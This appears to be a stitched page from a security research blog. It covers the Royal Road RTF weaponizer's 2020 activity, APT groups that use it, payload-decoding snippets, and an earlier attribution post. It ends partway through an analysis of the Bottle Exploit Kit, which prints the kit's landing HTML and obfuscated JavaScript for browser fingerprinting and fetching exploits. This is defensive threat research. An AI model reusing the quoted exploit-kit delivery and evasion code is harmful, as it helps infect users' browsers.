“Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager [6] CheckPoint Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/ [7] Tencent, “APT攻击组织”黑格莎（Higaisa）”攻击活动披露”, https://s.tencent.com/research/report/836.html [8] Tencent, ““Higaisa（黑格莎）”组织近期攻击活动报告”, https://s.tencent.com/research/report/895.html [9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa”, https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/ [10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート”, https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report [11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon [12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ [13] CheckPoint Research, “Vicious Panda: The COVID Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ [14] BitDefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/ [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

<img src="https://nao-sec.org/assets/2021-01-05/00.png" alt="" /> <h2 id="abstract">Abstract</h2> We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. It’s been a year since our previous blog, and Royal Road is still in use. Here, we will introduce the Royal Road-related attacks observed during 2020. <h2 id="previous-blog">Previous Blog</h2> Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files that exploit the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool are unknown, but the RTF file generated by it has various characteristics. The definition of “RTF file generated by Royal Road” may vary from researcher to researcher. Therefore, we define a file that meets the following conditions as an “RTF file generated by Royal Road”. <ol> <li>Exploiting a vulnerability in Microsoft Office Equation Editor</li> <li>Containing an object named “8.t”</li> </ol> However, some RTF files are likely to be related to Royal Road, even though they don’t meet the second condition. For classification purposes, we refer to this as “Related Samples”. In reality, this may also be an RTF file generated by Royal Road, but the truth is only known to the attacker. Due to the our research, we have divided these into “Royal Road Samples” and “Related Samples”. However, they are treated the same in the specific case studies below. And Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following attack groups. The attack group alias is written for reference. Strictly speaking, these can be different. For example, TA428 and Pirate Panda are not exactly equivalent. <ol> <li>Temp.Tick (BRONZE BUTLER, RedBaldKnight)</li> <li>Temp.Conimes (Goblin Panda, Cycldek)</li> <li>Temp.Periscope (Leviathan, APT40)</li> <li>Temp.Trident (Dagger Panda, IceFog)</li> <li>Tonto (Karma Panda, CactusPete, LoneRanger)</li> <li>TA428 (Pirate Panda)</li> <li>Rancor</li> </ol> Also, we categorized the various characteristics of the RTF files used by these groups and showed what they have in common. <img src="https://nao-sec.org/assets/2021-01-05/01.png" alt="" /> <h2 id="updates">Updates</h2> It’s been a year since we introduced Royal Road. In the meantime, the RTF file, believed to have been generated by Royal Road, has been used many times in targeted attacks, and several updates have been observed. First of all, we will introduce the updates. The RTF file generated by Royal Road contains encoded malware. It is decoded by Shellcode after exploit. In our previous blog, we introduced the following 5 encodings. <ol> <li>4D 5A 90 00 (not encoded)</li> <li>F2 A3 20 72</li> <li>B2 A6 6D FF</li> <li>B0 74 77 46</li> <li>B2 5A 6F 00</li> </ol> Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used the new encodings. The following 2 encodings. <ol> <li>A9 A4 6E FE</li> </ol> <img src="https://nao-sec.org/assets/2021-01-05/02.png" alt="" /> This encoding can be decoded with code like the following: <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dec_data = [] for i in range(len(enc_data)): dec_data.append(((int.from_bytes(enc_data[i], "little") ^ 0x7b) + 0x7b) % 256) </code></pre></div></div> <ol> <li>94 5F DA D8</li> </ol> <img src="https://nao-sec.org/assets/2021-01-05/03.png" alt="" /> This encoding can be decoded with code like the following: <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dec_data = [] xor_key = 1387678300 for i in range(len(enc_data)): for _ in range(7): x0 = (xor_key & 0x20000000) == 0x20000000 x1 = (xor_key & 8) == 8 x2 = xor_key & 1 x3 = 1 + (x0 ^ x1 ^ x2) xor_key = (xor_key + xor_key) + x3 dec_data.append(int.from_bytes(enc_data[i], "little") ^ (xor_key % 256)) </code></pre></div></div> Our tool for decrypting Royal Road encoded object is already available on GitHub. It also supports the above new encodings. <a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a> <h2 id="new-attack-groups">New Attack Groups</h2> As we mentioned earlier, several attack groups use Royal Road. The following eight attack groups have been observed to use Royal Road (including both Royal Road Samples and Related Samples) during 2020. <ol> <li>Temp.Conimes</li> <li>Tonto</li> <li>TA428</li> <li>Naikon</li> <li>Higaisa</li> <li>Vicious Panda</li> <li>FunnyDream</li> <li>TA410</li> </ol> Of these, we have already reported on 1-3 attack groups in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia such as Russia. And the TA428 was also particularly active, using PoisonIvy, Cotx RAT, Tmanger, and nccTrojan to attack East Asian organizations such as Mongolia. We will not cover these individual cases here, but if you are interested, see the IOC chapter. For TA428, the paper [2] and blogs [3][4][5] are available from NSJ (NTT Security Japan). Please refer to that. For Naikon, CheckPoint Research reported [6], but unfortunately, we could not observe this. Therefore, in the following, we will introduce attack cases related to Royal Road for four groups (5-8). <h3 id="higaisa">Higaisa</h3> Higaisa is an attack group that seems to have been active since at least around 2016. It is primarily targeted at North Korean-related organizations and is believed to be aimed at stealing information using AttackBot, PIZ Stealer, and Gh0st RAT. The blogs have been written by Tencent and Positive Technologies so far [7][8][9], and are attributed to (South) Korea. However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12], and it was reported that it might belong to China. We observed an attack by Higaisa on Royal Road in March 2020. <img src="https://nao-sec.org/assets/2021-01-05/04.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/05.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/06.png" alt="" /> The malware executed by the Royal Road RTF was AttackBot. AttackBot is a downloader that has been used by Higaisa since at least April 2018. <img src="https://nao-sec.org/assets/2021-01-05/07.png" alt="" /> <h3 id="vicious-panda">Vicious Panda</h3> Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and targets East Asia such as Russia, Mongolia, and Ukraine. We observed an attack on the Royal Road by Vicious Panda in March 2020. <img src="https://nao-sec.org/assets/2021-01-05/08.png" alt="" /> It has been reported to execute malware similar to Enfal and BYEBY. <img src="https://nao-sec.org/assets/2021-01-05/09.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/10.png" alt="" /> <h3 id="funnydream">FunnyDream</h3> FunnyDream is an attack group that is said to have been active since around 2018. It is said to belong to China and targets Southeast Asia such as Vietnam and Malaysia. FunnyDream uses Chinoxy and FunnyDream Backdoor. BitDefender has published a detailed report [14] on FunnyDream. We observed an attack by FunnyDream from March to May 2020. <img src="https://nao-sec.org/assets/2021-01-05/11.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/12.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/13.png" alt="" /> Chinoxy is a RAT that has been used by FunnyDream since around 2018. It decoded the config using two numeric data and communicates with the C&C server using its original protocol using Blowfish. <h3 id="ta410">TA410</h3> TA410 is an attack group that is said to have been active since around 2016. It is said to belong to China and is suspected to be related to APT10. The report has been published by Proofpoint [15][16][17] and is mainly targeted at public sector in the US. It uses malware called LockBack and FlowCloud. We observed an attack by TA410 in October 2020. <img src="https://nao-sec.org/assets/2021-01-05/15.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/16.png" alt="" /> FlowCloud is a RAT reported by Proofpoint in June 2020. FlowCloud has been reported to be v4 and v5, but the FlowCloud we observed at this time was similar to v4. <h2 id="attack-case-against-japan">Attack case against Japan</h2> In addition to the four attack groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), attacks that appear to be related to Royal Road have been observed. Among them, we will introduce an example of attacks on Japan. We are not able to identify which attack group made this attack. If you have any knowledge about it, please share it with us… The attack on Japan took place in November 2020. The attack began with 2 RTF files attached to the email. <img src="https://nao-sec.org/assets/2021-01-05/18.png" alt="" /> <img src="https://nao-sec.org/assets/2021-01-05/19.png" alt="" /> These RTF files did not contain an 8.t object, however did contain an associated object. This is the malware encoded by the 4th (B0 74 77 46) encoding shown above. <img src="https://nao-sec.org/assets/2021-01-05/20.png" alt="" /> The overall picture of the attack is as follows. <img src="https://nao-sec.org/assets/2021-01-05/21.png" alt="" /> The malware executed was an unknown RAT. We call this XLBug RAT because of the characteristics left in this RAT. The RAT held information such as C&C server encoded by Base64 and XOR. <img src="https://nao-sec.org/assets/2021-01-05/22.png" alt="" /> The following commands are implemented in XLBug RAT. <ul> <li>Get directory information</li> <li>Get file information</li> <li>Get computer information</li> <li>Execute file</li> <li>Upload file</li> <li>Download file</li> <li>Rename file</li> <li>Delete file</li> <li>Delete itself</li> </ul> The naming convention and encoding of the encoded object contained in the RTF are similar to those of the TA428. However, we could not say that this was a TA428 attack. <h2 id="relationship">Relationship</h2> In the previous blog, we summarized the characteristics of attack groups that use Royal Road. We used it to divide the attack groups into two groups. However, by 2020, those characteristics are almost meaningless. It has been standardized or deleted. It’s not as easy to group as it used to be. In the first place, the groups sharing Royal Road should be close. We do not classify further, but if you have any comments please let us know. <h2 id="yara-rule">Yara Rule</h2> The GitHub repository we shared in the previous blog is still being updated. <a href="https://github.com/nao-sec/yara_rules">https://github.com/nao-sec/yara_rules</a> <h2 id="ioc">IOC</h2> The IOC sheet shared in the previous blog is still being updated. <a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a> <h2 id="tool">Tool</h2> The tool used by Royal Road to decrypt encoded object is still being updated. <a href="https://github.com/nao-sec/rr_decoder">https://github.com/nao-sec/rr_decoder</a> <h2 id="wrap-up">Wrap-Up</h2> The attacks using Royal Road have decreased compared to 2019, but are still ongoing. There are many cases of attacks by TA428 and Tonto, but other attacks by different attack groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed. The attacks on Japan have also been observed and we were unable to identify this with a known attack group. The use of Royal Road by these unknown attack groups is expected to continue. In addition to Royal Road, there are other cases, such as the Tmanger family, that appear to share tools among multiple targeted attack groups. We should continue to pay close attention to these tool sharing cases. <h2 id="acknowledgments">Acknowledgments</h2> “nao_sec” is an independent research team that does not belong to any company. Individuals belong to each company and engage in research, but the activities of nao_sec still maintain their independence from each company. We are grateful to all of you who cooperated with our research activities every day. <hr /> <h2 id="references">References</h2> [1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html [2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf [3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger [4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas [5] NTT Security Japan, “Panda’s New Arsenal: Part 3 Smanager”, https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager [6] CheckPoint Research, “Naikon APT: Cyber Espionage Reloaded”, https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/ [7] Tencent, “APT攻击组织”黑格莎（Higaisa）”攻击活动披露”, https://s.tencent.com/research/report/836.html [8] Tencent, ““Higaisa（黑格莎）”组织近期攻击活动报告”, https://s.tencent.com/research/report/895.html [9] Positive Technologies, “COVID-19 и новогодние поздравления: исследуем инструменты группировки Higaisa”, https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/covid-19-i-novogodnie-pozdravleniya-issleduem-instrumenty-gruppirovki-higaisa/ [10] NTT Security Japan, “Crafty Panda 標的型攻撃解析レポート”, https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report [11] Cylance (BlackBerry), “The Ghost Dragon”, https://blogs.blackberry.com/en/2016/04/the-ghost-dragon [12] Palo Alto Networks, “PKPLUG: Chinese Cyber Espionage Group Attacking Southeast Asia”, https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ [13] CheckPoint Research, “Vicious Panda: The COVID Campaign”, https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ [14] BitDefender, “A Detailed Timeline of a Chinese APT Espionage Attack Targeting South Eastern Asian Government Institutions”, https://labs.bitdefender.com/2020/11/a-detailed-timeline-of-a-chinese-apt-espionage-attack-targeting-south-eastern-asian-government-institutions/ [15] Proofpoint, “LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards”, https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks [16] Proofpoint, “LookBack Forges Ahead: Continued Targeting of the United States’ Utilities Sector Reveals Additional Adversary TTPs”, https://www.proofpoint.com/us/threat-insight/post/lookback-forges-ahead-continued-targeting-united-states-utilities-sector-reveals [17] Proofpoint, “TA410: The Group Behind LookBack Attacks Against U.S. Utilities Sector Returns with New Malware”, https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
An Overhead View of the Royal Road

Wed, 29 Jan 2020 15:00:00 -0000

Abstract Several targeted attack groups share the tools used in the attack and are reported to be doing similar attacks. Attack tools are also shared in attacks targeting Japanese organizations, for example, Tick. Tick may use a tool called Royal Road RTF Weaponizer. And Royal Road is used by targeted attack groups such as Goblin Panda and Temp.Trident that is suspected of being involved in China. In this blog, we will focus on the Royal Road, and introduce the features of the tool, such as the outline of the tool, its behavior, and the exploited vulnerability. Next, the targeted attack groups that use the Royal Road are listed, and each attack case is shown in detail. We have collected over 100 malicious documents from 2018 and investigated malware that is deployed and downloaded from there. Even in groups using the same Royal Road, we attributed them based on the target country/organization, the technique used for the attack, the malware executed, etc. There are a wide variety of countries/organizations targeted for attack, mainly in Asia. Such information has been published by researchers all over the world, but it’s not widely known that Royal Road is used in Tick attacks targeting Japanese organizations. Attacks using Royal Road are still active in 2019. Share analysis results of malicious documents and malware based on the cases we observed. Other targeted attack groups may be related to Royal Road. We introduce the attack cases of these attack groups and show their relevance. Finally, we show the hunting technique using the characteristics of RTF files using Royal Road and the techniques that are preferred by targeted attack groups that use them. This blog will help researchers who are researching and analyzing targeted attacks and CSIRT/SOC members to understand the attacks and take countermeasures. Summary Royal Road Royal Road is RTF weaponizer that named by Anomali. Sometimes called “8.t RTF exploit builder”. This tool is not OSS, However it’s shared between multiple actors. We define the RTFs generated by RoyalRoad is supposed to satisfy the following two conditions: Exploit the vulnerability in the Equation Editor Have an object named 8.t in the RTF Royal Road behaves as follows. RTF create a file (8.t) using ActiveX Control “Package” when opening a document All Vulnerabilities used by exploit coed are based on Equation Editor. CVE-2017-11882 CVE-2018-0798 CVE-2018-0802 It decode 8.t, execute malware, dll-sideloading, etc Classification v1-v5 defined by Proofpoint and Anomali published at VB2019. We are doing more research about RTF Object. RTF analysis showed that there was a special byte sequence immediately before the shellcode. We called that an object pattern. 8.t encoding is not distinguished by version. It’s considered an actor distinction rather than a tool distinction. About v3, RTF including 8.t could not be found in our survey, so we define this as RoyalRoad-related, not RoyalRoad. New version definitions for v6 and later. The object string has changed a little since v5, but it is basically the same. v7 has a very different object string. v7 object pattern is same as v4-v6, but part ofobject data exists randomly. For attribution Time submission to public service RTF creation Target country decoy file language RTF characteristics Object strings Object patterns Package patterns Object name, Path Payload encoding patterns Dropped file name Malware execution techniques T1137 (Office Application Startup) T1073 (DLL Side-Loading) Final payload (malware family) Actors Here are the actors that have been confirmed to use RoyalRoad. It is considered that China’s involvement is suspected. These are tables summarizing each actor’s characteristics. We categorize these actors into three groups. Group Group-A is Conimes, Periscope and Rancor. Group-B is Trident, Tick, TA428 and Tonto. Group-C is something else we don’t know. Group-A is targeting Southeast Asia. Periscope and Conimes ware active at the same time and share the same techniques. Conimes and Rancor ware also active at the same time and share some techniques. We believe these groups are close and may share tools and insights. Group-B is including Trident, Tick, TA428 and Tonto. These are actors targeting East Asia, especially Russia, Korea and Japan. Tick, TA428 and Tonto may use the same technique. Especially Tick and Tonto are very similar. We believe that Group-B actors are very close and share techniques and insights. Wrap-up The RTF file created using the Royal Road exploits a vulnerability in the equation editor. The RTF file has a various of characteristics that help with attribution. There are many actors who use Royal Road. We can divide them into three groups and suppose connections between actors. Appendix Appendix-1: IOC https://nao-sec.org/jsac2020_ioc.html Appendix-2: Tool rr_decoder Yara Rules Full report is here: [PDF (EN)]

<h2 id="abstract">Abstract</h2> Several targeted attack groups share the tools used in the attack and are reported to be doing similar attacks. Attack tools are also shared in attacks targeting Japanese organizations, for example, Tick. Tick may use a tool called Royal Road RTF Weaponizer. And Royal Road is used by targeted attack groups such as Goblin Panda and Temp.Trident that is suspected of being involved in China. In this blog, we will focus on the Royal Road, and introduce the features of the tool, such as the outline of the tool, its behavior, and the exploited vulnerability. Next, the targeted attack groups that use the Royal Road are listed, and each attack case is shown in detail. We have collected over 100 malicious documents from 2018 and investigated malware that is deployed and downloaded from there. Even in groups using the same Royal Road, we attributed them based on the target country/organization, the technique used for the attack, the malware executed, etc. There are a wide variety of countries/organizations targeted for attack, mainly in Asia. Such information has been published by researchers all over the world, but it’s not widely known that Royal Road is used in Tick attacks targeting Japanese organizations. Attacks using Royal Road are still active in 2019. Share analysis results of malicious documents and malware based on the cases we observed. Other targeted attack groups may be related to Royal Road. We introduce the attack cases of these attack groups and show their relevance. Finally, we show the hunting technique using the characteristics of RTF files using Royal Road and the techniques that are preferred by targeted attack groups that use them. This blog will help researchers who are researching and analyzing targeted attacks and CSIRT/SOC members to understand the attacks and take countermeasures. <h2 id="summary">Summary</h2> <h3 id="royal-road">Royal Road</h3> Royal Road is RTF weaponizer that named by Anomali. Sometimes called “8.t RTF exploit builder”. This tool is not OSS, However it’s shared between multiple actors. We define the RTFs generated by RoyalRoad is supposed to satisfy the following two conditions: <ol> <li>Exploit the vulnerability in the Equation Editor</li> <li>Have an object named 8.t in the RTF</li> </ol> Royal Road behaves as follows. <ol> <li> RTF create a file (8.t) using ActiveX Control “Package” when opening a document </li> <li>All Vulnerabilities used by exploit coed are based on Equation Editor. <ul> <li>CVE-2017-11882</li> <li>CVE-2018-0798</li> <li>CVE-2018-0802</li> </ul> </li> <li>It decode 8.t, execute malware, dll-sideloading, etc</li> </ol> <img src="https://nao-sec.org/assets/2020-01-30/behavior.png" alt="" /> Classification v1-v5 defined by Proofpoint and Anomali published at VB2019. We are doing more research about RTF Object. RTF analysis showed that there was a special byte sequence immediately before the shellcode. We called that an object pattern. 8.t encoding is not distinguished by version. It’s considered an actor distinction rather than a tool distinction. About v3, RTF including 8.t could not be found in our survey, so we define this as RoyalRoad-related, not RoyalRoad. New version definitions for v6 and later. The object string has changed a little since v5, but it is basically the same. v7 has a very different object string. v7 object pattern is same as v4-v6, but part ofobject data exists randomly. <img src="https://nao-sec.org/assets/2020-01-30/version.png" alt="" /> <h3 id="for-attribution">For attribution</h3> <ul> <li>Time <ul> <li>submission to public service</li> <li>RTF creation</li> </ul> </li> <li>Target country <ul> <li>decoy file language</li> </ul> </li> <li>RTF characteristics <ul> <li>Object strings</li> <li>Object patterns</li> <li>Package patterns</li> <li>Object name, Path</li> </ul> </li> <li>Payload encoding patterns</li> <li>Dropped file name</li> <li>Malware execution techniques <ul> <li>T1137 (Office Application Startup)</li> <li>T1073 (DLL Side-Loading)</li> </ul> </li> <li>Final payload (malware family)</li> </ul> <h3 id="actors">Actors</h3> Here are the actors that have been confirmed to use RoyalRoad. It is considered that China’s involvement is suspected. <img src="https://nao-sec.org/assets/2020-01-30/actor1.png" alt="" /> <img src="https://nao-sec.org/assets/2020-01-30/actor2.png" alt="" /> These are tables summarizing each actor’s characteristics. We categorize these actors into three groups. <img src="https://nao-sec.org/assets/2020-01-30/actor_details.png" alt="" /> <h3 id="group">Group</h3> <ul> <li>Group-A is Conimes, Periscope and Rancor.</li> <li>Group-B is Trident, Tick, TA428 and Tonto.</li> <li>Group-C is something else we don’t know.</li> </ul> <img src="https://nao-sec.org/assets/2020-01-30/group.png" alt="" /> Group-A is targeting Southeast Asia. Periscope and Conimes ware active at the same time and share the same techniques. Conimes and Rancor ware also active at the same time and share some techniques. We believe these groups are close and may share tools and insights. <img src="https://nao-sec.org/assets/2020-01-30/groupA.png" alt="" /> Group-B is including Trident, Tick, TA428 and Tonto. These are actors targeting East Asia, especially Russia, Korea and Japan. Tick, TA428 and Tonto may use the same technique. Especially Tick and Tonto are very similar. We believe that Group-B actors are very close and share techniques and insights. <img src="https://nao-sec.org/assets/2020-01-30/groupB.png" alt="" /> <h3 id="wrap-up">Wrap-up</h3> The RTF file created using the Royal Road exploits a vulnerability in the equation editor. The RTF file has a various of characteristics that help with attribution. There are many actors who use Royal Road. We can divide them into three groups and suppose connections between actors. <h3 id="appendix">Appendix</h3> <h4 id="appendix-1-ioc">Appendix-1: IOC</h4> <ul> <li><a href="https://nao-sec.org/jsac2020_ioc.html">https://nao-sec.org/jsac2020_ioc.html</a></li> </ul> <h4 id="appendix-2-tool">Appendix-2: Tool</h4> <ul> <li><a href="https://github.com/nao-sec/rr_decoder">rr_decoder</a></li> <li><a href="https://github.com/nao-sec/yara_rules">Yara Rules</a></li> </ul> <hr /> Full report is here: <a href="https://github.com/nao-sec/materials/raw/master/JSAC%2BCPRCon2020/An_Overhead_View_of_the_Royal_Road.pdf">[PDF (EN)]</a>
Say hello to Bottle Exploit Kit targeting Japan

Thu, 12 Dec 2019 15:00:00 -0000

First On December 11, 2019, we were strolling through ad-networks. As before, we observed RIG, Fallout and Underminer Exploit Kit, but observed other interesting Drive-by Download attack. We call it “Bottle Exploit Kit”. BottleEK targets only Japanese users. According to our research, BottleEK has been active at least in September 2019. This time we introduce BottleEK. Sample traffic data is here. Traffic We have confirmed that we are redirected to BottleEK by malvertising. When you are redirected from ad-network to BottleEK, the landing page html is loaded first. The landing page loads two JavaScipt files. <!doctype html> <html lang="ja"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=10"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Cache" content="no-cache"> <link href="file/style.css" rel="stylesheet" type="text/css"/> </head> <body style="background-color: #F4F4F4;font-family:MS PGothic,Arial,Hiragino Kaku Gothic ProN,Osaka,sans-serif"> <div id="main" class="main"></div> <script type="text/javascript" src="file/ajax.min.js"></script> <script type="text/javascript" src="file/main.js"></script> </body> </html> “ajax.min.js” is a JavaScript file for communication. It is used once to get the exploit code URL. Since it’s not important, we will omit it this time. Please remember only this code. function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), document.body.removeChild(b), q(a) }, b.src = h + (h.indexOf("?") > -1 ? "&" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b) } Next, let’s read “main.js”. This file contains obfuscation, debug detection and environment detection.　Reading everything is not easy… First, a large array is defined. This looks like a Base64 string, but base64_decode doesn’t make any meaningful data. To decrypt this, you need to read two processes. var _0x1d5a = ['bsK+BcOlwpXCmg==', 'OsKhwoIKb8OOwrHDsMOvEcOHw4Fn', 'ZMKfw6Fqw5R0', 'T1xqw70=', ... The first process is to swap the order of the arrays. This is code like this: var _0x5906e4 = function (_0x35d916) { while (--_0x35d916) { _0x4480b8['push'](_0x4480b8['shift']()); } }; /* --- Snip --- */ var _0x29fbca = { 'getCookie': function (_0xa8b74, _0x1731ce) { _0xa8b74 = _0xa8b74 || function (_0x1e7379) { return _0x1e7379; }; var _0x36cf86 = _0xa8b74(new RegExp('(?:^|;\x20)' + _0x1731ce['replace'](/([.$?*|{}()[]\/+^])/g, '$1') + '=([^;]*)')); var _0x3ff1ff = function (_0xf3a699, _0x2d4894) { _0xf3a699(++_0x2d4894); }; _0x3ff1ff(_0x5906e4, _0x3c6c93); return _0x36cf86 ? decodeURIComponent(_0x36cf86[0x1]) : undefined; } } _0x29fbca['getCookie'](null, 'counter'); Next, the array data with the order changed is decoded. This is the code for decryption. A combination of Base64, URL Encode and RC4. var decode = function (enc_data, key) { var a = [], b = 0, c, d = '', e = ''; enc_data = atob(enc_data); for (var i = 0, length = enc_data['length']; i < length; i++) { e += '%' + ('00' + enc_data['charCodeAt'](i)['toString'](16))['slice'](-2); } enc_data = decodeURIComponent(e); for (var i = 0; i < 256; i++) { a[i] = i; } /* RC4 */ for (i = 0; i < 256; i++) { b = (b + a[i] + key['charCodeAt'](i % key['length'])) % 256; c = a[i]; a[i] = a[b]; a[b] = c; } i = 0; b = 0; for (var j = 0; j < enc_data['length']; j++) { i = (i + 1) % 256; b = (b + a[i]) % 256; c = a[i]; a[i] = a[b]; a[b] = c; d += String['fromCharCode'](enc_data['charCodeAt'](j) ^ a[(a[i] + a[b]) % 256]); } return d; }; This decrypts the array data and executes the main process. First, check that username is set in the cookie. If it is set, processing ends. If not, set cookie username=bingv and the attack will continue. var user = getCookie('username'); if (user == '') { setCookie('username', 'bingv', 0x1); Next, check user environment. This is one of the most characteristic codes of the Bottle Exploit Kit. var chk = checkEnv(); checkEnv gets the browser language setting. If it is not Japanese, display a dummy html and end. function checkEnv() { var _0x4db42a = (navigator['language'] || navigator['browserLanguage'])['toLowerCase'](); if (_0x4db42a['indexOf']('ja') == -0x1) return 0x0; document['getElementById']('main')['innerHTML'] = "<h1>Customer Login</h1><form><input type='text'value='User'><input type='password'><input type='submit'value='Submit'></form>"; And, browser information is acquired by User-Agent. If it is not Internet Explorer, display a dummy html and end in the same way. var _0x100f15 = navigator['userAgent']; var _0xed2c96 = _0x100f15['indexOf']('compatible') > -0x1 && _0x100f15['indexOf']('MSIE') > -0x1; var _0x4d34a9 = _0x100f15['indexOf']('Trident') > -0x1 && _0x100f15['indexOf']('rv:11.0') > -0x1; if (_0xed2c96) { if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) { var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);"); _0x41dde8['test'](_0x100f15); var _0x50d3cb = parseFloat(RegExp['$1']); return _0x50d3cb; } else { _0x53ccba(this, function () { var _0x2e6966 = new RegExp("function *$ *$"); var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i'); var _0x4fc827 = _0x118083('init'); if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) { _0x4fc827('0'); } else { _0x118083(); } })(); } If these checks are passed, the image is displayed. The 1.gif used at this time is an image of the bottle. The str1 displayed below the image is Japanese. var str1 = '読み込み中。。。お待ちください&nbsp;&nbsp;&nbsp;&nbsp;'; /* --- Snip --- */ if (chk > 0x0) { var myimg = document['createElement']('img'); myimg['setAttribute']('id', 'ldimg'); myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline'); myimg['setAttribute']('src', 'file/1.gif'); document['body']['appendChild'](myimg); var myp = document['createElement']('p'); myp['setAttribute']('id', 'ldpr'); myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;'); document['body']['appendChild'](myp); for (var i = 0x0; i <= LOAD_SECOND; i++) { var progress = Math['round'](i * 0x64 / LOAD_SECOND); (function (_0x368e63) { setTimeout(function () { change_progress(_0x368e63, str1); }, i * 0x3e8); }(progress)); } And it gets the exploit code. Three parameters are used at that time. Internet Explorer version is 64bit Adobe Flash Player version var is64 = 0x0; if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1; var fls = flashChecker(); ajax({ 'type': 'GET', 'dataType': 'jsonp', 'timeOut': 0x2710, 'url': '/conn.php?callback=?', 'data': { 'data1': chk, 'data2': is64, 'data3': fls['v'] }, When send this request, use the ajax.min.js you read earlier. Therefore, callback is added at the end. function e() { var b = document.createElement("script"), c = (new Date).getTime() + Math.round(1e3 * Math.random()), d = "JSONP_" + c; a[d] = function (a) { clearTimeout(s), 